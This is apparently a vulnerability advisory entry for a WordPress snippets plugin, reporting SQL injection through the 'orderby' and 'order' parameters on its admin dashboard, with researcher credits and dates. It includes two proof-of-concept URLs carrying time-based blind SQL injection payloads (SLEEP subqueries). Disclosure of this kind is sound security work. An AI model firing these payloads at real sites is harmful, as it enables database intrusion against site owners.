The plugin does not validate and escape the "orderby" and "order" request parameters before using them in a SQL statement when viewing the Snippets admin dashboard, leading to SQL injections
https://example.com/wp-admin/admin.php?page=hfcm-list&orderby=%28SELECT+5619+FROM+%28SELECT%28SLEEP%2810%29%29%29uWCv%29&order=DESC https://example.com/wp-admin/admin.php?page=hfcm-list&orderby=name&order=+AND+%28SELECT+9933+FROM+%28SELECT%28SLEEP%2810%29%29%29wbfm%29
bl4derunner
Anton Sarsadskikh
Yes
2021-10-11 (about 8 months ago)
2021-10-11 (about 8 months ago)
2022-04-08 (about 2 months ago)